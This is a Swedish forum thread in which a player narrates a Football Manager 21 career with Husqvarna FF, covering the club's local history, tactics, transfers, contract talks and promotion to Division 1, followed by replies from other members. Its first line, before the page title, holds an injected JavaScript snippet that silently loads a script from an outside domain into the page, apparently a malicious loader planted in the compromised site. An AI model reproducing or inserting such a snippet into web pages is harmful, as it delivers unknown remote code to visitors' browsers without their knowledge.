;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); [FM21] Från gärdsgårdar till finrummet – Avslutade rapporter – FMSweden Forum
Meny Stäng

[FM21] Från gärdsgå...
 
Share:
Notifications
Clear all

[FM21] Från gärdsgårdar till finrummet

18 Inlägg
7 Users
30 Likes
843 Visningar
(@jaggernut)
Active Member
Blev medlem: 2 år sedan
Inlägg: 12
Topic starter  

Detta blir min första rapport någonsin, så ge mig gärna konstruktiv kritik! Har en del erfarenhet av FM, men har aldrig varit någon superfena på taktik. Så har ni tips och trix där tar jag tacksamt emot.

Detta save kommer ha fokus på tränarkarriären. Klubblojalitet och spelarutveckling åker tyvärr rätt ner i vasken. Premisserna är enkla, jag börjar i svenska division 2 utan tränarutbildning eller tidigare erfarenhet. Slutmålet är att vinna Champions League så snart som möjligt. Det kommer alltså för mig som tränare handla om att klättra uppåt i karriärstegen och få ett så pass bra rykte att jag kan ta över en klubb som kontinuerligt är med och slåss om CL-titeln och sedan vinna. Jag kör så länge det är kul.

Nu åker vi.

OBS! Eftersom jag bestämde mig för att skriva rapporten ett par matcher in i säsongen är vissa av skärmdumparna inte tagna vid savestart.

Kapitel 1 – Vapen och syskonkärlek

Min karriär börjar i norra Småland, nämligen i Huskvarna - precis vid Vätterns strand. Under den tidiga delen av 1600-talet regerade Gustaf II Adolf i Sverige, och han beslutade att ett gevärsfaktori skulle byggas i Huskvarna för att kunna förse det svenska försvaret med vapen. Vapentillverkningen fortsatte i över 200 år till 1876 då den sista beställningen producerades. Sedan dess har Husqvarna AB fortsatt sin produktion inom bland annat symaskiner, cyklar, kaminer och motorcyklar. Fabriken finns kvar än idag och är just nu en av de världsledande producenterna av trädgårdsprodukter och motorsågar

Spoiler
Äldre bild på Husqvarna ABs fabrik
HUSQVARNA VAPENFABRIKS A.-B. HUSKVARNA.

Vi har alltså hamnat i en klassisk svensk gammal industriort. Orten har en långsam tillväxt och hade år 2020 ungefär 24 000 invånare. Men patriotismen är stark. Bara ett stenkast bort ligger Jönköping. Sveriges tionde största stad och given storebror till syskonstaden Huskvarna, även om en riktig Huskvarnabo aldrig skulle erkänna det. Både storleksmässigt och fotbollsmässigt är grannstaden Jönköping starkare, där Jönköpings Södra spelar två divisioner högre än rivalerna Huskvarna. Trots den starka rivaliteten mellan Huskvarna och Jönköping så brukar lagen traditionsenligt möta varandra som första träningsmatch inför säsongen.

Spoiler
Vy över Huskvarna och Vättern. I bakgrunden till vänster skymtar Jönköping
Huskvarna Sverige Jönköping Stad - Gratis foto på Pixabay

Mellan Huskvarna och Jönköping finns det två nämnvärda platser: Området Öxnehaga och skolan Sandagymnasiet. Öxnehaga är ett område som byggdes under 1970-talet som en del av miljonprojektet. Periodvis har detta område kantats av utanförskap och sociala problem, även om vissa insatser haft positiva effekter. Sen har de fotbollen. Många spelare med historia i Husqvarna FF och Jönköpings Södra är uppvuxna i just Öxnehaga. Amir Al-Ammari (nu i Halmstad), Edin Hamidovic (nu i Jönköpings Södra), Peter Gwargis (nu i Malmö FF) och Robert Gojani (nu i Elfsborg) för att nämna några. Att majoriteten av dessa spelare dessutom först spelat i Husqvarna och sedan handplockats av Jönköpings Södra gör rivaliteten städerna emellan än mer infekterad.

Spoiler
Vy från Öxnehaga ner mot Vättern. Jönköping ligger till väster och Huskvarna till öster.
Öxnehaga – Wikipedia

Den andra nämnvärda platsen är Sandagymnasiet. Ett idrottsgymnasium som kanske främst är känt för att producera talangfulla spelare till ishockeylaget HV71. Men man har även ett fotbollsprogram. På fotbollsträningarna mellan lektionerna smäller det extra hårt när en Huskvarnakille glidtacklar en kille från Jönköping. De mest talangfulla spelarna tillhör normalt sett Jönköpings Södra och spelarna som inte håller riktigt samma nivå får nöja sig med spel i Husqvarna. Det ska dock sägas att många unga killar från Huskvarna faktiskt vill spela för HFF och inte för J-Södra. Enligt en Huskvarnabo bor man på ”fel sida” om man bor i Jönköping.

Spoiler
Bild på Sandagymnasiet
Slut på distansundervisning – eleverna får komma tillbaka | SVT Nyheter

Så, på veckodagarna jobbar man i fabriken och på helgerna vill man se att det går åt helvete för Jönköpings Södra. Så enkelt är livet i Huskvarna.

Kort om klubben:

Husqvarna FF bildades den 3:e februari 1987 efter en sammanslagning mellan idrottsklubbarna Husqvarna IF och Huskvarna Södra IS. Klubben är inte van att husera riktigt såhär långt ner i seriesystemet. De senaste åren har Husqvarna hållit till i division 1 innan man 2018 åkte ur. Raset för klubben har ändå gått förhållandevis snabbt då man 2014 faktiskt spelade i Superettan. Laget tränar och spelar sina hemmamatcher på Vapenvallen i Huskvarna. Vapenvallen har plats för max 5000 åskådare.

Spoiler
Bild på Vapenvallen
Husqvarna FF

Inför säsongen:

Vi spelar i Division 2 Östra Götaland där vi på förhand tippas att sluta på fjärde plats. Årets säsong är speciell och svår på många sätt, inte minst då restriktionerna kring coronapandemin gjort att lagen bara möter varandra en gång. Vi har alltså bara 13 matcher på oss att nå en plats vi kan vara nöjda med. Det finns många nämnvärda lag i serien, inte minst Österlen som tippas gå upp. Här hittar vi bland annat den Malmömeriterade spelaren Freddie Brorsson. Men det finns en match alla Husqvarnafans ser fram emot - derbyt mot IK Tord. Tord spelar sina hemmamatcher på Rosenlunds IP, bara fyra kilometer från Vapenvallen.

Taktik:

Det finns ingen anledning att krångla till det. Vi spelar i division 2 och kommer spela en enkel fotboll. Klassiskt 4-4-2 där vi försöker utnyttja kantspelarnas snabbhet mixat med längre bollar till targetplayern Sonny Karlsson på topp. Klassiskt mittbackspar med en vänsterfotad och en högerfotad back. Acuña får ta något mer defensivt ansvar och Andersson står för bolltransporten. Vi använder oss av ett ganska så högt och intensivt press-spel oavsett motstånd. Vi gör detta för att försöka tvinga fram enkla misstag hos motståndarna i en liga med mycket skiftande individuella förmågor. Det enda vi justerar gällande press-spelet är om vi tvingar motståndarmålvakten till långa utsparkar eller inte. Vi har några starka huvudspelare i laget, men när vi möter ett lag som överlag är skickliga i huvudspelet ger vi motståndarmålvakten chansen att rulla ut bollen för att sedan pressa fram misstag.

Truppen:

Vi har en helt ok trupp, något tunn. Men vi har en hel del unga killar, inte minst William Lind. Mycket lovande spelare som redan dragit intresse till sig från bland annat Öster och Norrby.

Spoiler
William Lind

Valde även att flytta upp den unge Sebastian Dimitrijevic från reservlaget eftersom vi ser otroligt tunna ut på innermittfältet.

Spoiler
Sebastian Dimitrijevic

Vår kapten är Malek Iskander trots sin ganska unga ålder. Det är en spelare som kan spela på flera olika positioner och som mer eller mindre är given i startelvan.

Spoiler
Malek Iskander

Vi har två anfallare som kompletterar varandra riktigt bra. Den reslige Sonny Karlsson tillsammans med den kvicke anfallaren Benjamin Lindblad.

Spoiler
Sonny Karlsson

Spoiler
Benjamin Lindblad

På vänsterkanten huserar våra två chilenare: Julio Inai och Michael Silva. Båda har ganska hög förmåga sett till division 2 så vänsterkanten kommer nog bli viktig för oss i år.

Spoiler
Julio Inai

Spoiler
Michael Silva

Värvningar: 

De områden som mest akut behöver förstärkas är innermittfält och målvaktssidan.

Andree Larsson
Andree kommer senast från IFK Berga och kom på en fri transfer. En spelare som jag inte förväntar mig speciellt mycket av. Värvade in honom dels för att öka konkurrensen på innermittfältet, men framförallt för att ha en spelare som är bra på frisparkar. Kan visa sig viktig att plocka in sista tio i en match för att förvandla en enpoängare till trepoängare genom frispark.

Spoiler
Andree Larsson

Erik Watson
Innermittfältare på gratislån från Jönköpingsklubben Assyriska Turabdin. En ganska allround spelare som definitivt kan tampas om en plats i startelvan.

Spoiler
Erik Watson

Erik Ekblad
Fri transfer som senast spelat i Lidköpings FK. Snäppet vassare på egentligen alla områden än nuvarande förstemålvakten Hussein Hamzi.

Spoiler
Erik Ekblad


   
Q reacted
Citera
(@jaggernut)
Active Member
Blev medlem: 2 år sedan
Inlägg: 12
Topic starter  

Kapitel 2 - Brutna armar och lokalderby

Efter att jag varit i klubben i endast en vecka knackade jag på dörren till styrelseordförare Stefan Axelssons kontor. Ingen öppnade. "Visst fan, han är ju på jobbet", tänkte jag för mig själv innan jag lunkade vidare. Precis som alla andra i klubben har han ett jobb vid sidan av. Vi är ju trots allt bara en halvprofessionell klubb. Min hybris hade tagit överhanden. Jag är ju ingen Champions League-tränare. Inte än i alla fall.

Senare på eftermiddagen var det dags för träning. När jag precis hade instruerat spelarna i en klassisk Ajaxkvadrat såg jag ordförande Stefan Axelsson komma gåendes mot planen. Vi hälsade och utbytte några fraser om vädret innan jag frågade om jag inte kunde få gå en tränarutbildning som klubben betalar. Stefan svarade att trots att klubben inte har så mycket pengar så kan jag absolut få göra det, förutsatt att nivån på träningarna är fortsatt hög under min frånvaro.

Kul. Jag behöver gå så många tränarutbildningar som möjligt, så fort som möjligt, om jag ska ta mig någonstans i fotbollsvärlden.

Försäsongen:

Då var det äntligen dags för säsongen att dra igång. Försäsongen har varit otroligt frustrerande med ett fåtal ljusglimtar. Om vi börjar med de goda nyheterna så valde vi att spela träningsmatcher mot både AIK och Hammarby, mest för att dra in pengar till klubbkassan. Vi förlorade givetvis båda matcherna men kan vara stolta med våra insatser där vi i båda matcherna ändå hade helt okej med bollinnehav. Ett annat utropstecken från träningsmatcherna är 4-0 segern över division 1-laget Assyriska Turabdin.

De dåliga nyheterna: Tre viktiga spelare blev långtidsskadade under försäsongsträningen. Vår vänsterytter Julio Inai åkte på en allvarlig armfraktur och beräknas bli borta fyra (Ja, FYRA) månader. Riktigt tungt speciellt med tanke på att vi redan såg ganska tunna ut på yttermittfältspositionerna. Detta mynnade ut i ett mer eller mindre paniklån från Assyriska Turabdin. Midhad Jukovic som spelat tillsammans med inlånade Erik Watson i Turabdins reservlag. Lite tveksam till hans egenskaper så han blir en bänkspelare. Kocadag och Bernholtz kommer få ta varsin kant.

Spoiler
Midhad Jukovic

Den andra skadan drabbade även den vänsterkanten, nämligen vänsterbacken Michael Silva. Silva smällde ihop med målvakten Erik Ekblad på träning och ådrog sig en höftskada som gör att han blir borta ungefär fem veckor. Att denna skada sammanföl med Julio Inais fraktur gjorde det riktigt motigt eftersom jag hade stora förhoppningar på att många av våra mål skulle komma från just vänsterkanten. Tur i oturen är att Silva inte blir borta superlänge, och eftersom vi har så glest spelschema missar han inte så många matcher.

I samband med Michael Silvas skada blev även vår nyvärvade och tilltänkta förstemålvakt Erik Ekblad skadad. Han åkte precis som Silva på en höftskada och blir borta två till tre månader. På målvaktspositionen har vi ju den tidigare förstemålvakten Hussein Hamzi som ändå ser helt okej ut, men vi hade verkligen behövt försäsongen för att spela in Ekblad så att backlinjen känner sig trygga med sin nya målvakt.

Ligan startar:

Då var det dags för Division 2 Östra Götaland att dra igång! Vi börjar säsongen på hemmaplan där Kristianstadklubben Nosaby gästade. Tråkig match som slutar 1-1. Liten besvikelse.

Efter krysset mot Nosaby vinner vi två matcher innan det första riktiga mandomsprovet. Det var dags att möta medias favorit Österlen. På bortaplan. Det var en svajig match där vi stundtals fick utstå hårt tryck. Matchen slutade tillslut med förlust. 4-3 till Österlen.

Efter förlusten mot Österlen studsar vi tillbaka och vinner med uddamålet mot både Hässleholm och Asarum.
Sen blev det dags för derby. IK Tord gästade Vapenvallen och fick resa långväga. Hela 4,4 kilometer är det mellan IK Tords hemmaplan och Vapenvallen. Men vilken match det blev! Vi går in i pausvilan med en komfortabel 3-0 ledning signerad Benjamin Lindblad som stod för ett hattrick efter endast 34(!) minuters spel. Vi kommer ut från omklädningsrummet och ser alldeles för bekväma ut. IK Tord gör mål efter bara fem minuters spel och jag ska erkänna att jag fick en dålig känsla. Mindre taktiska justeringar och ett par byten senare krigade vi in bollen till 4-1 som också blev slutresultatet. Säsongens skönaste seger!

Sedan var det dags att resa upp till Södertälje för att möta Syrianska FC. För er som kan er fotboll så var det ju inte så många år sedan Syrianska faktiskt spelade i Allsvenskan. Vi lyssnade för mycket på deras rykte och visade alldeles för stor respekt. En riktig besvikelse att åka därifrån med en pinne, speciellt eftersom Syrianska bara tagit sex poäng sedan tidigare.

Jag hade ganska höga förväntningar på denna säsong och hade som personlig målsättning att hamna på en kvalplats upp till Division 1. Efter skador och en medioker inledning känns nu den målsättningen nästintill ouppnåelig. Det blir en lång väg till Champions League.


   
SvaraCitera
(@jaggernut)
Active Member
Blev medlem: 2 år sedan
Inlägg: 12
Topic starter  

Kapitel 3 - Spelarförsäljning och mirakel

Det har ryktats ett tag om att några klubbar i Superettan haft ögonen på 16-årige William Lind. Han har presterat helt okej under säsongen men inga iögonfallande insatser och det har inte varit något konkret intresse från någon klubb.

För ett par veckor sedan snackades det om att scouter från åtminstone Öster, Norrby och Västerås tittat på en av våra matcher. De var troligtvis där för att se Wille.

I förra veckan fick jag ett samtal från vår sportchef Alessandro Severino. "Västerås har lagt ett bud på Wille", säger han. "De vill betala 3 000kr och en vidareförsäljningsklausul på 30%", fortsätter han. Det första jag tänker är att det är ett riktigt skambud. Trots att Wille inte har någon lön så bör han ändå vara värd några fler tusenlappar. Efter förhandlingar accepterar jag och Alessandro ett bud värt 16 000kr och en vidareförsäljningsklausul på 50%.
Wille är påväg bort.

Mitten och slutet på säsongen:

Som ni redan läst har Husqvarna accepterat ett bud värt 16 000kr på William Lind. Vi som Division 2-klubb kan inte göra mycket mer än att tacka och ta emot när en Superettan-klubb knackar på dörren. Jag hade gjort detsamma. Som tur är gick Västerås med på att låna ut Wille till oss resterande delen av säsongen.

Förra kapitlet avslutades med att vi precis kryssat på bortaplan mot Syrianska. En vecka senare var det dags för oss att kliva in i Svenska Cupen där vi blivit lottade mot Division 3-laget Torslanda. Det blev betydligt jämnare än både jag och spelarna trott, men vi lyckas tillslut vinna efter förlängning.

Tre dagar efter matchen mot Torslanda skulle vi ta oss an ligaledarna Räppe GoIF. Det blev en tung förlust med 1-2 och vi kunde känna hur kvalplatsen mot Division 1 sakta gled ur våra händer. För att få upp moralen bokade jag in ett par träningsmatcher i vårt glesa spelschema. Vi vann båda matcherna men insatserna var helt klart bleka. 

Sen blev det dags för andra omgången i Svenska Cupen. Det kändes hopplöst på förhand där vi blivit lottade mot Superettan-klubben Öster, speciellt med tanke på hur svaga vi varit i ligan den senaste tiden. Vi fick en tidig ledning genom Andree Larsson på frispark. Det var en otroligt skön känsla eftersom Andree värvats in just som frisparksspecialist. Efter full tid står det 1-1 och min tanke är att vi måste göra allt för att ta detta till straffar. Men utan att jag egentligen behövde säga något till spelarna visade de en otrolig kämpaglöd och förlängningen slutar med att vi vinner med 3-1. Vi är klara för gruppspelet i Svenska Cupen! Riktigt bra tillskott i klubbkassan för en så liten klubb som Husqvarna.

Med hög moral går vi in i matchen mot Hässleholm och tänker att vi bara behöver spela som mot Öster så vinner vi. Det gick rakt åt skogen. Förlust med 0-2. Det kändes som spiken i kistan. Kvalspelet till Division 1 ser väldigt långt borta ut nu. Inför sista omgången ligger vi på femte plats och möter ligatvåan Älmeboda/Linneryd.

Som ni ser behöver ett antal matcher gå vår väg, samtidigt som vi vinner vår match för att ha en chans på kvalspel.

Sista matchen för säsongen?

Det är nervösa spelare som kliver ut på Vapenvallen inför säsongens sista match. Alla vet vad som står på spel. Alla vet att vi behöver en hel del hjälp för att ens ha en chans att gå upp. Men det är inte omöjligt. Vi börjar matchen piggt och Sonny Karlsson har en nick strax över ribban efter bara två minuters spel. Det känns som det kan gå. Då händer det - Gustaf Leding tappar huvudet totalt och går in vårdslöst i en tackling. Rött kort direkt. Ridå ner.

Men trots Ledings röda kort fortsätter vi att vara starka och skapar minst lika mycket som Älmeboda/Linneryd. I minut 84 kämpar Jukovic fram en hörna som han själv också slår. Bollen går rakt mot Sonny Karlsson som stångas som en tjur inne i straffområdet. Sonny når högst och trycker in bollen. Vapenvallen exploderar och publiken blir som galen. Vi har gjort vad vi kunnat, nu är det upp till de andra matcherna om vi ska ha en chans på uppflyttning.

Vi kommer in i omklädningsrummet efter matchen där alla spelare är glada men det känns ändå som en blöt filt ligger över hela stämningen. Hur har det gått i de andra matcherna? Alla spelare sitter med sina smartphones och försöker se hur det gått. Någon mumlar något. Sedan börjar det surras mer och mer innan Didric Andersson skriker: "VI ÄR KLARA FÖR KVAL!!!!". Vattenflaskor flyger, spelare springer nakna, materialaren Peppe skrålar "Sweet Caroline" och knäpper en öl.

Vi gjorde det. Trots att oddsen var emot oss gick alla matcher vår väg och vi har säkrat en kvalplats.

Nu får vi se vilka vi får möta.


   
raca14 reacted
SvaraCitera
Q
 Q
(@q)
Estimable Member
Blev medlem: 4 år sedan
Inlägg: 134
 

Möcke bra start med intressant lag, RIP Issa.
Jag tycker du har en bra text som gör det intressant, fortsätter du på samma sätt är mycket vunnet.

Fint med kvalplats efter en kort säsong, lycka till men inte för mycket. Utmaningen är halva nöjet!

VI HAR ALLTID DRÖMT OM ATT SPELA I BLÅRANDIGT - SPELA SOM I VÅRA DRÖMMAR!


   
jaggernut reacted
SvaraCitera
(@jaggernut)
Active Member
Blev medlem: 2 år sedan
Inlägg: 12
Topic starter  

Kapitel 4 - Kvalspel och drömlottning

Med lätta steg går jag in i klubbhuset på Vapenvallen. Vi hade precis lyckats överträffa förväntningarna och säkra kvalspel upp till Division 1. Men det är fortfarande en lång väg kvar. 

Jag loggar in på min arbetsdator för att se vilka vi lottats mot i uppflyttningskvalet. Vårgårda och IFK Malmö. Jag ska vara ärlig och säga att jag faktiskt inte har så bra koll på något av lagen, vi har ju inte mött dom innan. Det enda jag vet är att det med största sannolikhet kommer bli en väldigt tuff match mot IFK Malmö, som tillsammans med oss är de enda Division 2-lagen som kvalat in till Svenska Cupens gruppspel.

Kval till Division 1

Första matchen i kvalspelet blir mot Vårgårda. Tuff match på förhand, men efter att ha scoutat dom har jag och tränarstaben lyckats hitta ett par svagheter. Deras två största svagheter är att de är överlag långsamma och har ganska dåligt huvudspel. Vi väljer därför att försöka spela våra snabba spelare, spela ett rakare spel och slå höga svepande inlägg. 

Det ger resultat. Vi vinner tillslut matchen med 1-2 där matchens spelare är Benjamin Lindblad med sina två mål. Trots det blygsamma resultatet kändes det som en ganska komfortabel vinst. Vi darrar lite på slutet och släpper in ett mål men de är egentligen inte nära. Riktigt skönt inför matchen mot IFK Malmö.

IFK Malmö vinner sedan sin match mot Vårgårda och det kommer alltså bli en direkt avgörande match mellan Husqvarna och IFK Malmö. 

Matchen mot IFK Malmö blir en öppen match med riktigt hawaii-spel. Båda lagen skapar en hel del målchanser men vi känns farligare matchen igenom. Det dröjer dock till matchminut 63 innan nollan är spräckt. Sonny Karlsson gör ett karaktäristiskt nickmål på hörna. Även IFK Malmös mål kommer på hörna. Dock efter ett stort misstag av Benjamin Lindblad som försöker rensa bollen men skickar den rätt in i eget mål. Erik Watson avgör matchen i minut 76. Slutreslutatet blir vinst för Husqvarna med 2-1. 

Vi vinner gruppen och går vidare i kvalet.

Lottning till Svenska Cupen

Efter vinsten i kvalgruppen blev det dags för lottningen av gruppspelet i Svenska Cupen. Kändes på förhand otroligt ointressant med tanke på att vi hade betydligt större saker att tänka på just nu. Sen är vi mycket väl medvetna om att vi inte har så mycket att göra i Svenska Cupen, så det enda vi egentligen hoppades på var storlag så att det kunde ge lite klirr i kassan i form av publikintäkter.

Men lottningen blev roligare än jag nånsin kunnat tro. Vi får möta våra värsta rivaler - Jönköpings Södra. Det kommer utan tvekan bli en av nästa säsongs stora höjdpunkter!

Så kapitel 4 av min rapport blev en ganska lycklig historia. Än är vi inte klara för Division 1. Nu väntar lottning i kvalplayoffen.


   
raca14 reacted
SvaraCitera
(@jaggernut)
Active Member
Blev medlem: 2 år sedan
Inlägg: 12
Topic starter  

Kapitel 5 - Låsta kontraktsförhandlingar och svåra beslut 

Jag slår mig ner i stolen framför det massiva mahognyskrivbordet på ordförande Stefan Axelssons kontor. Jag hade blivit kallad till möte för att diskutera framtiden, hade Stefan sagt. Jag visste inte vad det kunde handla om, så jag var lite nervös.

Stefan slår sig ned bakom skrivbordet och ställer lite frågor om hur jag tycker säsongen gått, vad jag tror om kvalspelet och så vidare. När vi avhandlat artighetsfraserna säger Stefan: “Vi vill förlänga ditt kontrakt”, och tar upp några papper från översta skrivbordslådan.

Kontraktet jag blir erbjuden är ganska generöst måste jag erkänna. Drygt 30 000kr i månaden i två år. Det är nog inte så många Division 2-tränare som tjänar så mycket, tänker jag. Stefan skjuter fram en penna och tittar på mig förväntansfullt.

“Jag vill inte skriva på för två år”, säger jag.
“Va?”, säger Stefan. Hans förväntansfulla leende byts ut mot en tom blick. “Vad menar du?”, fortsätter han.
“Jag accepterar lönen ni erbjuder, men vill bara skriva på för ett år.”, säger jag. “Jag vill hålla alla dörrar öppna om en större klubb kontaktar mig”.

Jag ser på Stefan att han inte tycker om det jag säger. Han säger att kontraktslängden inte är förhandlingsbar, och att jag ska vara tacksam för ett så generöst erbjudande. Samtalet låser sig. Vi kan inte komma överens.

Jag lämnar Stefans kontor och går hemåt i den kyliga höstkvällen. Jag funderar på mitt och Stefans samtal. “Det kanske var dumt av mig att förhandla så hårt? De har ju trott på mig hela tiden och till och med betalat tränarutbildning”, tänker jag samtidigt som jag inser att mitt nuvarande kontrakt går ut om två veckor.

Fan också, vad gör jag nu?

Lottning i kvalplayoff

Några dagar efter mina misslyckade kontraktsförhandlingar med Stefan är det dags för lottning av kvalplayoffen. Det är vi och tre andra lag, som alla är mer meriterade än oss. Vi får möta Åtvidaberg som slutade tvåa i Division 2 Södra Svealand. I den andra matchen möts Division 1-lagen Tvååker och IFK Berga. Det kommer återigen bli ett tufft kval.

Trots att jag borde vara riktigt taggad på kvalet hade jag en klump i magen. Mitt kontrakt går ju snart ut. Bara ett par dagar före första kvalmatchen mot Åtvidaberg. Skulle allt mitt hårda arbete vara förgäves nu? Har jag jobbat så här hårt och sen inte ens få vara med och avsluta det?

Kontaktad av andra klubbar

I och med att min kontraktssituation var minst sagt prekär började jag se mig om. Jag noterade att Division 1-klubben Täby precis sparkat sin tränare. Med två matcher kvar att spela låg man näst sist, men hade fortfarande chans att nå en kvalplats. 

Högst motvilligt skickade jag iväg en jobbansökan till Täby. Jag kände verkligen inte för det, men vad skulle jag göra?

Dagen efter sitter jag på tåget upp mot Stockholm och Täby. Jag hade blivit kallad på intervju. Vi diskuterade målsättningar och den nuvarande truppen. Jag var inte alls såld på det här projektet, men jag vägrar att bli arbetslös.

När jag var hemma i Huskvarna igen kunde jag inte sova. Jag vill ju stanna i klubben. Så jävla klantigt av mig att förstöra den goda stämningen jag haft med Stefan.

Dagen efter blir jag kontaktad av Täby som erbjuder mig ett kontrakt. Jag trodde beslutet skulle vara svårare, men när jag väl fick frågan var det lätt - jag tackade nej. Skulle jag gå från en klubb som är påväg uppåt, till en klubb som är påväg nedåt? Aldrig. Jag chansade och hoppades in i det sista att Stefan skulle ringa mig igen. 

Sista dagen på mitt kontrakt ringde Stefan och ville träffas. Samma kontrakt låg på samma mahognyskrivbord. “Gör inget dumt nu”, säger Stefan. “Tänk efter”. Försiktigt sa jag: “Jag går med på två år, men skulle det vara möjligt att sänka klubbkompensationen till 50% istället för 90%?

Stefan ler och sträcker fram handen. “Det skakar vi hand på. Se till att säkra avancemanget till Division 1 nu.”


   
raca14 reacted
SvaraCitera
(@jaggernut)
Active Member
Blev medlem: 2 år sedan
Inlägg: 12
Topic starter  

Kapitel 6 - Eufori och lagbygge

Efter många om och men hade jag skrivit på för två nya år med Husqvarna FF. Jag trivdes ändå ganska bra här. Jag började till och med bli igenkänd på gatan av fotbollstokiga Husqvarna-fans. Det var kul att det gick så här bra. Och nu var det dags för de avgörande matcherna mot Åtvidaberg. Vinner vi de två matcherna spelas det Division 1-fotboll på Vapenvallen nästa säsong.

Kvalplayoff

När jag såg att vi skulle möta Åtvidaberg kändes det svårt. Åtvidaberg är ju ett klassiskt lag med lång historia. Det är lätt att man fastnar på sådant, även om vi alla vet att fotbollen är ombytlig.
Första matchen tog vi emot Åtvidaberg på hemmaplan. Trots att vi ledde med 2-0 efter 35 minuters spel var det Åtvidaberg som styrde spelet och hade det mesta av bollinnehavet. I andra halvlek utökar vi till 3-0 och återigen blir vi tyvärr för bekväma. Åtvidaberg lyckas trycka in två mål med 10 minuter kvar att spela. Slutresultatet skrivs till 3-2 och allt känns öppet inför returen. Matchens lirare blev tvåmålsskytten Sonny Karlsson.

Andra matchen ser ut på väldigt liknande sätt, men även där tar vi ledningen tidigt. Efter bara 16 minuters spel leder vi med 0-2. Åtvidaberg trycker på och skapar betydligt fler chanser i matchen. Vi har bara tre skott på mål under 90 minuters spel. I 89:e minuten reducerar Åtvidaberg men det räcker inte till. 

HUSQVARNA FF SPELAR I DIVISION 1 NÄSTA SÄSONG!!!

Spoiler
Uppflyttade

Här ser ni även säsongens spelarutmärkelser. Det råder ingen tvekan om att Benjamin Lindblad på många sätt bar laget på sina axlar.

Lagbygget inför nästa säsong

Trots att vi imponerat under säsongen och till och med tagit klivet upp var jag väl medveten om att vi behövde förstärka laget. Rejält. Egentligen hade varje position behövt hoppa upp ett snäpp. Men jag har några spelare jag litar extra på som kommer få fortsatt förtroende även nästa säsong. Två av dessa är Benjamin Lindblad och Michael Silva. Lindblad av förklarliga skäl, det såg ni på spelarutmärkelserna. Han har varit jagad av flera klubbar i Superettan och ett tag vägrade han till och med diskutera kring kontraktsförnyelse. Efter att vi blev klara för Division 1 var det annat ljud i skällan. Benjamin ville stanna och vi skrev på för två nya år. Michael Silva förlängde också sitt kontrakt. Han är en stabil ytterback som bidrar både framåt och bakåt. Två andra spelare som får förnyat förtroende är mittbackarna Andersson och Acuña.

Anton Henningsson
Den första spelaren jag siktat in mig på var Älmeboda/Linneryds anfallare Anton Henningsson. Hans målskytte förra säsongen förklarar nog det mesta. 18 mål på 13 matcher. Otroligt. Men han är även exakt den spelartypen vi behöver. Vår andre targetplayer Sonny Karlsson börjar bli till åren och gjorde en klart godkänd säsong, men jag hade hoppats mer på honom. Karlsson förpassas till bänken och Henningsson går rakt in i startelvan.

Vi lyckades värva Henningsson gratis efter att hans kontrakt gått ut.

Filip Ededal
Nästa spelare in blev GUSKs före detta mittfältsgeneral Filip Ededal. En allround spelare som ser mer stabil ut än alla våra nuvarande mittfältare. Fick in honom på en gratis övergång.

Spoiler
Ededals historik

Markus Alexandersson
Trots att vår målvaktssida sett relativt bra ut så gjorde båda målvakterna en hel del misstag förra säsongen som kostade oss poäng. Man får väl räkna med en del individuella misstag på den här nivån, men vi måste plocka in någon mer stabil. Tillsammans med mitt scoutteam började vi kika på Division 1. Nedflyttade Qviding hade en mycket intressant kandidat i form av Marcus Alexandersson. Alexandersson hade själv gått ut och sagt att han ville flytta, så vi la ett bud på 10 000 kr. Budet accepterades och efter ganska smidiga kontraktsförhandlingar skrev han på för Husqvarna.

Spoiler
Alexanderssons historik

Lassine Traore
En position vi haft en hel del problem på förra säsongen var yttermittfältet. Det fanns en spelare i vår liga som imponerade stort på mig när vi mötte Österlen. Det var vänsteryttern tillika anfallaren Lassina Traore. Han kostade oss 30 000kr, vilket jag tyckte var ett bra pris. Speciellt med tanke på att vi fått en transferbudget på strax över 100 000kr.

Spoiler
Traores historik

Anton Maikkula
Vi har även sett väldigt tunna ut på ytterbackspositionerna, speciellt på högerbacken. Där har vår kapten Malek Iskander fått husera och han har gjort det helt okej. Malek fungerar även som innermittfältare så när nästa värvningskandidat dök upp på vår radar kunde vi inte säga nej. Vi värvar in Anton Maikkula från Division 1-klubben IFK Berga på en gratis övergång. Det är ännu inte helt givet att Maikkula kommer bli förstavalet på högerbacken, men som det ser ut nu så kommer han vara startspelare och Malek Iskander får alternera mellan innermittfältet och högerbacken.

Spoiler
Maikkulas historik

Som ni ser handlar förberedelserna inför säsongen att bygga ett mer stabilt lag där vi vet vad vi kan förvänta oss från varje individ. Vi måste minimera de individuella misstagen och vi har försökt att värva in spelare med erfarenhet från högre divisioner. Förhoppningsvis kommer de även bidra med en vinnarmentalitet och kan visa de övriga spelarna vad som förväntas av en Division 1-spelare.

I nästa kapitel blir det antagligen en uppdatering om försäsongen och eventuellt spelare in/ut.


   
Micke reacted
SvaraCitera
(@jaggernut)
Active Member
Blev medlem: 2 år sedan
Inlägg: 12
Topic starter  

Avslutar rapporten redan nu pga märkbart bristande intresse.

 

Om någon mot förmodan är intresserad av hur det går framåt får ni kommentera.

 

Tack för mig


   
SvaraCitera
Micke
(@micke)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 239
 

@jaggernut Tråkigt att höra! Vore spännande att följa din fortsatta resa uppåt i seriesystemet, den har ju bara börjat. Grattis till uppflyttningen 🙂

"I have never played for a draw in my life." - Sir Alex Ferguson


   
SvaraCitera
(@jaggernut)
Active Member
Blev medlem: 2 år sedan
Inlägg: 12
Topic starter  

@micke Håller med! Var sjukt taggad på att skriva denna rapporten faktiskt. Men svårt att vara motiverad när den läses av typ 2 pers, haha.


   
Micke reacted
SvaraCitera
Micke
(@micke)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 239
 

@jaggernut Det är nog många som läser i skymundan och ej kommenterat ännu som säkert vill läsa vidare också. Men förstår naturligtvis att det är svårt att hålla uppe motivationen utan kommentarer.

"I have never played for a draw in my life." - Sir Alex Ferguson


   
SvaraCitera
raca14
(@raca14)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 225
 

@jaggernut Kan ju säga att jag läst igenom rapporten och gillar den, så sorry för en dålig feed-back.


   
Micke reacted
SvaraCitera
jompaa11
(@jompaa11)
Active Member
Blev medlem: 4 år sedan
Inlägg: 6
 

Även jag har läst, ser gärna en fortsättning då det verkar vara en rolig rapport att följa 🙂

"And all I ask is a tall ship and a star to steer her by"


   
Micke reacted
SvaraCitera
(@skilltown)
Active Member
Blev medlem: 4 år sedan
Inlägg: 6
